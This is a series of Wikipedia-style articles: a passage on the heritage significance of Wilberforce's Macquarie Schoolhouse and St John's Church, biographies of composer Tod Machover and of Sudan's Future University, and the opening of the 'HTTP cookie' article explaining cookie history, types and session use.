He chose the sites of the town, church and burial ground personally. His creation of these towns on the Hawkesbury in 1810 was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy and education of the young into their lifestyles. The establishment of the Schoolhouse demonstrated the importance Governor Macquarie attached to educating the children of the emancipated convicts of the Hawkesbury who constituted the rising generation of colonial freeborn.
Of all the church/school/cemetery centres established in these towns, Wilberforce is the one which is most intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town.
The Schoolhouse is also significant as the location of the annual muster from 1823.
The site includes the significant view corridor from the verhadah of the Schoolhouse to the Wilberforce Cemetery.
The church of St John completed in 1859 to the design of architect Edmund T Blacket added an additional element which secured the continued use of this site for its original purpose by enabling the congregation to continue meeting in a building which could accommodate them all.
The place has a strong or special association with a person, or group of persons, of importance of cultural or natural history of New South Wales's history.
It meets this criterion of State significance because the Wilberforce Schoolhouse and its site have a close association with Governor Lachlan Macquarie.
It was erected to meet his desire to promote education and religion at the core of the towns he laid out on the Hawkesbury. His scheme of establishing a school, church and burial ground on an elevated and/or central position was fully realised at Wilberforce during his governorship. He chose the sites of the town, church and burial ground personally. His creation of these towns in 1810 was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy into their lifestyles. The establishment of the Schoolhouse demonstrated the importance Governor Macquarie attached to educating the children of the emancipated convicts of the Hawkesbury who constituted the rising generation of colonial freeborn. Not only did he establish the policy regarding the towns and their schools-cum-chapels but he personally visited the sites to select the best positions. By laying out the village, selecting the site of the square, church and cemetery, plus promoting the construction of the schoolhouse-cum-chapel, Governor Lachlan Macquarie left his personal signature on the village of Wilberforce. Of all the church/school/cemetery centres established in the towns, this is the one which is most intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town.
The Schoolhouse is also significant as the location of the annual muster from 1823.
The church of St John was completed in 1859 to the design of architect Edmund T Blacket who was a church architect of considerable significance since his Gothic style churches largely created the ecclesiastical style of building so strongly associated with the Victorian era in NSW.
Wilberforce Schoolhouse and St John's are also associated with John Wenban, a noted early schoolteacher who taught at the school for many years and who donated the unusual sundial which graces the exterior of St John's Church.
The place is important in demonstrating aesthetic characteristics and/or a high degree of creative or technical achievement in New South Wales.
The Macquarie schoolhouse is of high aesthetic significance as a surviving and reasonably intact substantial Old Colonial Georgian building. Changes to the building have not altered its original form and symmetry. Deliberately sited near one of the highest points in the town to ensure the prominence of the church in the burgeoning community, with the adjacent church it remains a focal point in the townscape.
St John's Anglican Church is a fine example of a simple rural church in the Victorian Gothic style by the esteemed nineteenth-century architect Edmund Blacket. Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. Designed in 1847 and erected between 1857 and 1859, St John's Church at Wilberforce is intact in its form and setting and a fine example of Blacket's early, small rural churches.
The church has a rare example of a vertical sundial in Australia, the work of the former schoolmaster, John Wenban.
The place has a strong or special association with a particular community or cultural group in New South Wales for social, cultural or spiritual reasons.
It meets this criterion of State significance because the Macquarie schoolhouse was the focus for education in Wilberforce until the 1870s whilst the schoolhouse and its successor St John's Church in association with its cemetery have been the core of religious activity in Wilberforce until the present day providing an unbroken chain of use and association for the community stretching back for nearly 200 years. The present church community at Wilberforce is a strong one, with worshippers drawn from beyond the Hawkesbury and is larger than the size of the village would suggest. A number of services are held each Sunday. The Blacket church is used for a traditional service in the morning for those who prefer that form of worship.
The commanding position of the site, with the schoolhouse and St John's Church, plus the associated burial ground, have provided a strong and visible focus for community identity.
The Hawkesbury was an important focus for early settlement from the 1790s. As the community grew, younger sons and the adventurous set out to settle newer lands, a process that continued throughout the nineteenth century. Since Wilberforce was one of the hearthlands of early Australia from which numerous families and individuals ventured forth to settle new lands and establish new communities elsewhere, it possesses a strong attraction for a broad spectrum of people who live beyond the district and draws them back to visit and refresh their family associations with Wilberforce. Church and cemetery are invariably a goal for many such visitors.
The place has potential to yield information that will contribute to an understanding of the cultural or natural history of New South Wales.
As the sole surviving example of a Macquarie town, with the original church/schoolhouse and cemetery still at the core of the village design as laid out by Macquarie, it meets this criterion of State significance. Only at Wilberforce is there tangible physical evidence of the manner in which Macquarie implemented his policy of social engineering through town planning with the civilising elements of education and religion at the core. A combined school and church at the centre of town or in a high position, coupled with a cemetery where all people were directed to inter their dead continually exposed former convicts to these influences with greater or lesser impact. The loss of key elements of the same combinations in the other towns he established means that only at Wilberforce can the full physical, sensory and aesthetic impact of this scheme be experienced.
As a site with early buildings, most notably the original temporary schoolhouse/chapel one of the earliest known buildings in Wilberforce which pre-dates the current 1819 Macquarie schoolhouse/chapel, the site has archaeological potential.
The place possesses uncommon, rare or endangered aspects of the cultural or natural history of New South Wales.
It meets this criterion of State significance because Governor Lachlan Macquarie's scheme of establishing a school, church and burial ground on an elevated and/or central position was fully realised at Wilberforce during his governorship. Of the four towns he established where Macquarie laid out a schoolhouse/chapel – Castlereagh, Pitt Town, Wilberforce and Richmond – only the Wilberforce example survives. The loss of elements of similar groups in other Macquarie towns or the loss of the inter-connectness of their parts means that the Macquarie Schoolhouse and St John's Church are arguably the purest expressions today of what Lachlan Macquarie sought to establish as key anchor points in his townscapes and in his programme of civilising convict society and ameliorating its less moral elements. His creation of these towns was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy into their lifestyles. Of all the church/school/burial ground combinations established in the towns, Wilberforce is the one which is most intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town. The church of St John completed in 1859 to the design of architect Edmund T Blacket added an additional element which secured the continued use of this site for its original purpose. The elements of schoolhouse, church and cemetery are inter-dependent. Views between the different elements reinforce the power of religion and education and the hope that they would reinforce each other in re-making a new more moral society. Views into and out of the site intensified that objective. The school and church looked down from a commanding position. One had to look upwards to view the church and school.
The place is important in demonstrating the principal characteristics of a class of cultural or natural places/environments in New South Wales.
It meets this criterion of State significance because the Wilberforce Macquarie Schoolhouse and burial ground with its later addition of the Blacket church are the epitome of what Lachlan Macquarie wished to implement as demonstrable elements of power, education and religion. The loss of elements of similar groups in the other Macquarie towns or the loss of the inter-connectedness of their parts means that the Macquarie Schoolhouse and St John's are arguably the purest expressions today of what Lachlan Macquarie sought to establish as key anchor points in his townscapes and in his programme of civilising convict society and ameliorating its less moral elements.
St John's Anglican Church is a good representative example of the Victorian Gothic church. Features that are typical of the style include the steeply pitched roof, high quality stonework, belfry, chancel and narrow pointed arched windows. The simplicity of the church is a feature of his designs for rural churches and it is a fine and largely intact example of his rural work.
Edmund Thomas Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. St John's Church of England at Wilberforce was one of his small rural churches, designed in 1847 and erected between 1857 and 1859. Comparable small churches include St Mark's, Picton (1850–7), St John the Evangelist, Hartley (1857–9), St James, Pitt Town (1857–9) and Holy Trinity, Berrima (1849–). A small later church built for a modest rural community is All Saints, Condobolin (1878–9). Though there is no definite evidence that he designed it, circumstantial evidence points to Blacket as the designer. Many other churches designed by E T Blacket were for large towns such as Wellington and Goulburn or for Sydney or its suburbs, which were of a different order and scale to his smaller rural churches.
St John's Anglican Church is a fine example of a simple rural church in the Victorian Gothic style by the esteemed nineteenth-century architect Edmund Blacket. Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. Designed in 1847 and erected between 1857 and 1859, St John's Church at Wilberforce is intact in its form and setting and a fine example of Blacket's early, small rural churches.
See also
Australian non-residential architectural styles
List of Anglican churches in the Diocese of Sydney
References
Bibliography
Australian Dictionary of Biography.
Attribution
External links
Wilberforce
Wilberforce, New South Wales
Houses in New South Wales
Wilberforce
Defunct schools in New South Wales
Articles incorporating text from the New South Wales State Heritage Register
John, Wilberforce
1859 establishments in Australia
Churches completed in 1859
Victorian architecture in New South Wales
Gothic Revival architecture in New South Wales
Gothic Revival church buildings in Australia
|
5255479
|
https://en.wikipedia.org/wiki/Tod%20Machover
|
Tod Machover
|
Tod Machover (born November 24, 1953 in Mount Vernon, New York), is a composer and an innovator in the application of technology in music. He is the son of Wilma Machover, a pianist and Carl Machover, a computer scientist.
He was named Director of Musical Research at IRCAM in 1980. Joining the faculty at the new Media Laboratory of the Massachusetts Institute of Technology (MIT) in 1985, he became Professor of Music and Media and Director of the Experimental Media Facility. Currently Professor of Music and Media at the MIT Media Lab, he is head of the Lab's Hyperinstruments/Opera of the Future group and has been Co-Director of the Things That Think (TTT) and Toys of Tomorrow (TOT) consortia since 1995. In 2006, he was named Visiting Professor of Composition at the Royal Academy of Music in London. He has composed significant works for Yo-Yo Ma, Joshua Bell, Matt Haimovitz, the Ying Quartet, the Boston Pops, the Los Angeles Philharmonic, Penn & Teller, and many others, as well as designed and implemented various interactive systems for performance by Peter Gabriel and Prince. Machover gave a keynote lecture at NIME-02, the second international conference on New Interfaces for Musical Expression, which was held in 2002 at the former Media Lab Europe in Dublin, Ireland, and is a frequent lecturer worldwide. Machover is a Finalist for the 2012 Pulitzer Prize in Music for his opera "Death and the Powers."
Education
He attended the University of California at Santa Cruz in 1971 and received a BM and MM from the Juilliard School in New York where he studied with Elliott Carter and Roger Sessions (1973–1978). He also started his Doctoral studies at Juilliard before being invited as Composer-in-Residence to Pierre Boulez's new Institut de Recherche et Coordination Acoustique/Musique (IRCAM) in 1978.
History
In the fall of 1978, Tod Machover arrived at IRCAM in Paris, and was introduced to Giuseppe di Giugno's digital synthesizer 4 series. Light was premiered at the Metz Festival in November 1979 using 4C, the brain-child of di Giugno's concept that "synthesizers should be made for musicians, not for the people that make them." (Electric Sound, p. 181). In 1981 he composed Fusione Fugace for solo performance on a real-time digital synthesizer, called the 4X machine. At IRCAM 1986 and 1987 he was motivated to score for keyboard and percussion duet with emphasis on extending their performance into many complex sound layers. He composed Valis, again using di Giugno’s 4X system to process voices. This desire to enhance the human performance foreshadowed his concept of the hyperinstrument (term coined in 1986). At MIT's Media Lab, he developed methods for taking many more sophisticated measurements of the instrument as well as the performer’s expression. He focused on augmenting keyboard instruments, percussion, strings, even the act of conducting, with the goal of developing and implementing new technology in order to expand the function of the musical instruments and their performers. He propelled forward-thinking research in the field of musical performance and interaction using new musical and technological resources. Originally concentrated to the enhancement of virtuosic performance, research has expanded in a direction of building sophisticated interactive musical instruments for non-professional musicians, children, and the general public. He premiered 'Brain Opera' in 1996, an interactive music experience with hyper instruments that aimed at making every human being into a musician.
Hyperinstruments
Hyperviolin
Basically an electric violin, audio output provides raw material for real-time timbre analysis and synthesis techniques. Coupled with an enhanced bow (see Hyperbow), measured properties of both the audio output of the instrument and the bowing gesture of the player create data which controls aspects of the resulting amplified sound.
Hypercello
In addition to bow pressure and string contact, wrist measurements and left-hand fingering-position indicators create measurements which are evaluated and processed in response to the performance.
Hyperbow
Bowing parameters (speed, force, position) are measured and data is processed to create an interaction between performance properties and audio output. Different types or styles of bowing create complex calculations which are conducive to the performance and manipulation of larger structures and compositional shapes.
Hyperpiano
MIDI data generated by performer on a Yamaha Disklavier is manipulated by various Max/MSP processes as accompaniment and augmentation of keyboard performance.
Stage works
Valis: an opera in two parts (1987) (OCLC ) based on Philip K. Dick's novel VALIS
Brain Opera (1996), an original, interactive musical experience that included contributions from both on-line participants and live audiences. It toured Europe, Asia, the United States and South America from 1996 to 1998 and was permanently installed at Vienna's House of Music in the spring of 2000.
Resurrection (1999 at Houston Grand Opera with Joyce DiDonato) (based on Leo Tolstoy's last novel)
Skellig (2008), an opera based on the novel of the same name by David Almond
Death and the Powers (2010), an opera with live electronics and robotics developed by the M.I.T. Media Lab. Libretto by Robert Pinsky Powers
Schoenberg in Hollywood (2018), an opera with film and live electronics commissioned by the Boston Lyric Opera. Libretto by Simon Robson
Compositions
Ye Gentle Birds (1979) for soprano, mezzo-soprano and wind ensemble
Fresh Spring (1977) for baritone solo and large chamber ensemble
With Dadaji in Paradise (1977-'78, rev. 1983) for solo cello
Two Songs (1978) for soprano and chamber ensemble
Concerto for Amplified Guitar (1978) for amplified acoustic guitar and large chamber ensemble
Deplacements (1979) for amplified guitar and computer-generated tape
Light (1979) for chamber orchestra and computer electronics
Soft Morning, City! for soprano, double bass, and computer-generated tape
Winter Variations (1981) for large chamber ensemble
String Quartet No. 1 (1981)
Fusione Fugace (1981-'82) for keyboard, two specialized interfaces, and live 4X digital synthesizer
Chansons d'Amour (1982) for solo piano
Electric Etudes (1983) for amplified cello, live and pre-recorded computer electronics
Spectres Parisiens (1983-'84) for flute, horn, cello, chamber orchestra and computer electronics
Hidden Sparks (1984) for solo violin
Famine (1985) for four amplified voices and computer-generated sounds
Desires (1985-'89) for symphony orchestra
Nature's Breath (1988-'89) for chamber orchestra
Towards the Center (1988-'89) for amplified flute, clarinet, violin, cello, electronic keyboard and percussion, with five hyperinstrument electronics
Flora (1989) for pre-recorded soprano and computer-generated sound
Bug Mudra (1989-'90) for two guitars (electric and amplified-acoustic), electronic percussion, conducting dataglove, and interactive computer electronics
Begin Again Again … (1991) for Yo-Yo Ma and hypercello Hyperstring Trilogy
"Song of Penance" (1992) for hyperviola and chamber orchestra Hyperstring Trilogy
"Forever and Ever" (1993) for hyperviolin and orchestra Hyperstring Trilogy
Hyperstring Trilogy (1991-'93, rev. 1996-'97) for hypercello, hyperviola, hyperviolin and chamber orchestra Hyperstring Trilogy
Bounce (1992) for hyperkeyboards, Yamaha Disklavier Grand piano and interactive computer electronics
He's Our Dad (1997) for soprano, keyboard and computer-generated sound
Meteor Music (1998) interactive installation Meteorite Museum
"Sparkler" (2001) for orchestra and interactive computer electronics Sparkler
"Toy Symphony" (2002/3) for hyperviolin Children's Chorus, Music Toys, and Orchestra Toy Symphony
"Mixed Messiah" (2004), a 6-minute remix of Handel's Messiah Mixed Messiah
"I Dreamt A Dream" (2004) for youth chorus, piano and electronics
"Sea Soaring" (2005) for flute, electronics, and live audience interaction Music Garden
...but not simpler... (2005) Not Simpler
Jeux Deux (2005) for hyperpiano and orchestra Jeux Deux
Another Life (2006) for nine instruments and electronics
"VinylCello" (2007) for amplified cello, DJ and live computer electronics
"Spheres and Splinters" (2010) for hypercello, spatialized audio reproduction, and visuals Spheres and Splinters
"Open up the House" (2013) for soprano and piano National Opera Center America
A Toronto Symphony: Concerto for Composer and City (2013) for orchestra and electronics composed with the citizens of Toronto A Toronto Symphony
Festival City (2013) for orchestra and electronics composed with the public for the Edinburgh International Festival
Between the Desert and the Deep Blue Sea: A Symphony for Perth (2014) for orchestra and electronics composed with the public for the Perth International Arts Festival
Breathless (2014) for flute, orchestra and electronics Bemidji Symphony Orchestra
Time and Space (2015) for orchestra, inspired by the essays of Michel de Montaigne
A Symphony for Our Times (2015) for live piano and recorded orchestra and electronics, for the closing performance of the World Economic Forum Annual Meeting in 2015
Restructures (2015) for two pianos and electronics, tribute to Pierre Boulez premiered at the 2015 Lucerne Festival
Eine Sinfonie für Luzern (2015) for orchestra and electronics, created with the public for the 2015 Lucerne Festival
Fensadense (2015) for ten musicians and hyperinstruments with live electronics, premiered at the 2015 Lucerne Festivalra
"Symphony in D" (2015) for orchestra, voice, additional performers and electronics, premiered by the Detroit Symphony
"Philadelphia Voices" (2018) for four choirs, to be premiered by Westminster Choir College's Symphonic Choir at the Kimmel Center and Carnegie Hall.
Journal articles
Awards
Chevalier de l'Ordre des Arts et des Lettres, France (1995)
DigiGlobe Prize in Interactive Media, Germany (1998)
Telluride Tech Festival Award of Technology and the Ray Kurzweil Award of Technology in Music, USA (2003)
Charles Steinmetz Prize from IEEE and Union College, "USA" (2007)
Pulitzer Prize in Music Finalist for "Death and the Powers" (2012)
Kennedy Center for the Performing Arts Award for Arts Advocacy (2013)
2016 Composer of the Year, Musical America
References
External links
Web page
Faculty profile
Research & Projects
Opera of the Future Blog
NewMusicBox
Shaping Minds Musically
Music-Making for All
CNN Video Documentary 1/07
"My Cello" by Tod Machover in Sherry Turkle's book, Evocative Objects: Things We Think With, MIT Press 2007.
Tod Machover Playlist Appearance on WMBR's Dinnertime Sampler radio show April 16, 2003
"Inventing instruments that unlock new music" (TED2008)
Toy Story: An MIT Project Helps Musical Novices Express Themselves article in Andante (online magazine), September 5, 2002 (archived 2007)
1953 births
20th-century classical composers
21st-century American composers
21st-century classical composers
Academics of the Royal Academy of Music
American classical composers
American male classical composers
American opera composers
Living people
Male opera composers
MIT Media Lab people
20th-century American composers
20th-century American male musicians
21st-century American male musicians
|
28979857
|
https://en.wikipedia.org/wiki/The%20Future%20University%20%28Sudan%29
|
The Future University (Sudan)
|
The Future University (FU) (), or simply Future University, formerly known as Computer Man College () or (CMC), is the first specialized Information and communications technology university in Sudan. Since its establishment in 1991 as Computer Man College, it was considered the first college to introduce an Information Technology program in the region; and within the country, it was the first to introduce a Computer Engineering program and the second to introduce the Telecommunication Engineering and Architecture & Design programs. It was upgraded to a university in August 2010 by the Sudan Ministry of Higher Education and Scientific Research. The university adopts the credit hours system in its education process, one of the first educational institutes to implement this system in Sudan. It is the first private academic institution in Sudan hosting a UNESCO chair. Currently, the university contains seven faculties, each offering several programs (some running and others proposed).
History
About the founder
Dr. Abubaker Mustafa Mohammed Khair the founder and chairman of the Board of Trustees of The Future University, received a B.Sc. in Electrical Engineering, Computer Engineering Communication (University of Belgrade, 1970), M.Sc. in Computer Technology, Computer System (American University), Applied Science in Engineering, (George Washington University, 1975), and a Ph.D. in Management of Information Systems (George Washington University).
First years
The foundation of the college was accompanied with the huge bounce in the field of information technology which the world has witnessed. The effect has been reflected in the administrative and economical structure of Sudan and other countries; new concepts were created, such as globalization, knowledge societies, e-commerce and e-government.
During this era, the college embarked on strategic plans to offer three programs: Information Technology, Computer Engineering and Computer Science, and then introduce the Telecommunication Engineering and Architecture & Design programs. CMC is in buildings that are almost 20 years old; The Future University's new campus is being constructed.
From CMC to FU
Upgrading Computer Man College into the new Future University has been requested from the Sudan Ministry of Higher Education and Scientific Research three times, beginning 15 years ago.
It was eventually approved in 2010. On the morning of the day after the approval, many of the students reported that they were surprised when they came in the college; because they saw the new sign at the forefront of the buildings saying “Future University” instead of the old “Computer Man College.” On that day, a camel and a number of sheep were sacrificed (i.e. slaughtered) inside the campus, and their meat was given away as charity (Karāma) for the poor and other people in the shape of a good-deed attempt to thank the grace of God that the college has been upgraded.
Faculties
Faculty of Information Technology, offering 10-semester B.Sc.degree programs in Information Technology, Knowledge Management, Knowledge Engineering, Digital Marketing and Digital Banking, and a six-semester Diploma program in Information Technology
Faculty of Computer Science, with B.Sc.degree programs in Computer Science, Artificial Intelligence, and Bio-Informatics, and a Diploma program in Telecommunication Engineering.
Faculty of Telecommunication and Space Technology, with B.Sc.degree in Telecommunication Engineering and Satellite Engineering
Faculty of Engineering, with B.Sc.degree programs in Computer Engineering, Electronics Engineering, Bio-Medical Engineering, Laser Engineering, and Mechatronics Engineering, and Diploma programs in Computer Engineering, Electronics Engineering, and Network Engineering .
Faculty of Architecture, with B.Sc.degree programs in Architecture & Design .
Faculty of Geo-Informatics, with B.Sc.degree programs in Geo-Informatics and Remote Sensing
Faculty of Arts and Design, offering B.Sc.degree programs in Interior Design and Graphic Design and Creative Multimedia .
There are also Diploma programs in E-Commerce Technology, Commerce & Accounting Information Technology, and Internet Design Technology, and one-semester certificate program for Additional & Continuing Education and International Computer Driving License
Centers of Excellence
Space Technology Center
FU Alumni
UNESCO/Cousteau Ecotechnie Chair
Centre for E-Learning and Software Development (CESD)
Affiliations with international universities
Multimedia University, Malaysia
UNITAR University, Malaysia
Limkokwing University, Malaysia
Nettuno University, Italy
International Centre for Theoretical Physics (ICTP), Italy
Linkoping University, Sweden
University of Brasilia, Brazil
University of Rio Grande, Brazil
University of São Paulo, Brazil
Norwegian University of Science and Technology, Norway
University of Tromsø, Norway
Oslo University, Norway
Tennessee University, USA
Boston University, USA
California Institute of Technology, USA
The logo
The current logo of The Future University was the winning logo in a contest the university held among the students and staff
The new buildings
The university has recently started building its new campus located side by side with the old and current buildings. It is planned to contain modern lecture rooms, labs, auditorium and libraries, and accommodate about 18,000 students. In 2006, the land of the new campus was procured by the college, an area of 20,000 square meters. The cost of construction, equipment and furnishing the whole new buildings of the campus amounts to be approximately US$60 million. The building has been paused several times for unclear reasons; the chairman of the board stated in an interview that he believes that the whole new buildings will be set up, fully constructed and ready to use by the end of 2011. But as of early 2017, it still has not been constructed and still remains in the foundation phase.
See also
List of universities in Sudan
List of universities in Africa
Education in Sudan
Sudanese Universities Information Network
Association of Sudanese Universities
References
External links
Universities and colleges in Sudan
Education in Khartoum
Educational institutions established in 1991
Science and technology in Sudan
Scientific organisations based in Sudan
1991 establishments in Sudan
|
5068415
|
https://en.wikipedia.org/wiki/HTTP%20cookie
|
HTTP cookie
|
HTTP cookies (also called web cookies, Internet cookies, browser cookies, or simply cookies) are small blocks of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's web browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.
Cookies serve useful and sometimes essential functions on the web. They enable web servers to store stateful information (such as items added in the shopping cart in an online store) on the user's device or to track the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to save for subsequent use information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers.
Authentication cookies are commonly used by web servers to authenticate that a user is logged in, and with which account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples).
Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories a potential privacy concern that prompted European and U.S. lawmakers to take action in 2011. European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device.
Background
Origin of the name
The term "cookie" was coined by web-browser programmer Lou Montulli. It was derived from the term "magic cookie", which is a packet of data a program receives and sends back unchanged, used by Unix programmers. The term magic cookie itself derives from the fortune cookie, which is a cookie with an embedded message.
History
Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in web communications in June 1994. At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for MCI. Vint Cerf and John Klensin represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994, supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and was granted in 1998. Support for cookies was integrated with Internet Explorer in version 2, released in October 1995.
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence. The public learned about cookies after the Financial Times published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the Internet Engineering Task Force (IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by Brian Behlendorf and David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.
At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
RFC 2965 added a Set-Cookie2 header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original Set-Cookie header field which was called "Netscape-style cookies". Set-Cookie2 was seldom used, however, and was deprecated in RFC 6265 in April 2011 which was written as a definitive specification for cookies as used in the real world. No modern browser recognizes the Set-Cookie2 header field.
Terminology
Session cookie
A session cookie (also known as an in-memory cookie, transient cookie or non-persistent cookie) exists only in temporary memory while the user navigates a website.
Session cookies expire or are deleted when the user closes the web browser. Session cookies are identified by the browser by the absence of an expiration date assigned to them.
Persistent cookie
A persistent cookie expires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).
For this reason, persistent cookies are sometimes referred to as tracking cookies because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. However, they are also used for "legitimate" reasons (such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit).
Secure cookie
A secure cookie can only be transmitted over an encrypted connection (i.e. HTTPS). They cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.
Http-only cookie
An http-only cookie cannot be accessed by client-side APIs, such as JavaScript. This restriction eliminates the threat of cookie theft via cross-site scripting (XSS). However, the cookie remains vulnerable to cross-site tracing (XST) and cross-site request forgery (CSRF) attacks. A cookie is given this characteristic by adding the HttpOnly flag to the cookie.
Same-site cookie
In 2016 Google Chrome version 51 introduced a new kind of cookie with attribute SameSite. The attribute SameSite can have a value of Strict, Lax or None. With attribute SameSite=Strict, the browsers would only send cookies to a target domain that is the same as the origin domain. This would effectively mitigate cross-site request forgery (CSRF) attacks. With SameSite=Lax, browsers would send cookies with requests to a target domain even it is different from the origin domain, but only for safe requests such as GET (POST is unsafe) and not third-party cookies (inside iframe). Attribute SameSite=None would allow third-party (cross-site) cookies, however, most browsers require secure attribute on SameSite=None cookies.
The Same-site cookie is incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism" to update RFC 6265 (if approved).
Chrome, Firefox, Microsoft Edge all started to support Same-site cookies. The key of rollout is the treatment of existing cookies without the SameSite attribute defined, Chrome has been treating those existing cookies as if SameSite=None, this would keep all website/applications run as before. Google intended to change that default to SameSite=Lax in February 2020, the change would break those applications/websites that rely on third-party/cross-site cookies, but without SameSite attribute defined. Given the extensive changes for web developers and COVID-19 circumstances, Google temporarily rolled back the SameSite cookie change.
Third-party cookie
Normally, a cookie's domain attribute will match the domain that is shown in the web browser's address bar. This is called a first-party cookie. A third-party cookie, however, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is often used by advertisers in an effort to serve relevant advertisements to each user.
As an example, suppose a user visits www.example.org. This website contains an advertisement from ad.foxytracking.com, which, when downloaded, sets a cookie belonging to the advertisement's domain (ad.foxytracking.com). Then, the user visits another website, www.foo.com, which also contains an advertisement from ad.foxytracking.com and sets a cookie belonging to that domain (ad.foxytracking.com). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the HTTP referer header field.
, some websites were setting cookies readable for over 100 third-party domains. On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.
Most modern web browsers contain privacy settings that can block third-party cookies, and some now block all third-party cookies by default - as of July 2020, such browsers include Apple Safari, Firefox, and Brave. Safari allows embedded sites to use Storage Access API to request permission to set first-party cookies. In May 2020, Google Chrome introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies. Chrome plans to start blocking third-party cookies by default in 2023.
Supercookie
A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com.
Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of .com, could maliciously affect a request made to example.com, even if the cookie did not originate from example.com. This can be used to fake logins or change user information.
The Public Suffix List helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
Other uses
The term "supercookie" is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such "supercookie" mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and ETag cookies. Due to media attention, Microsoft later disabled this code. In a 2021 blog post, Mozilla used the term "supercookie" to refer to the use of browser cache (see below) as a means of tracking users across sites.
Zombie cookie
A zombie cookie is data and code that has been placed by a web server on a visitor's computer or other device in a hidden location outside the visitor's web browser's dedicated cookie storage location, and that automatically recreates a HTTP cookie as a regular cookie after the original cookie had been deleted. The zombie cookie may be stored in multiple locations, such as Flash Local shared object, HTML5 Web storage, and other client-side and even server-side locations, and when the cookie's absence is detected, the cookie is recreated using the data stored in these locations.
Cookie wall
A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.
Structure
A cookie consists of the following components:
Name
Value
Zero or more attributes (name/value pairs). Attributes store information such as the cookie's expiration, domain, and flags (such as Secure and HttpOnly).
Uses
Session management
Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual "shopping cart" or "shopping basket"). Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.
Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.
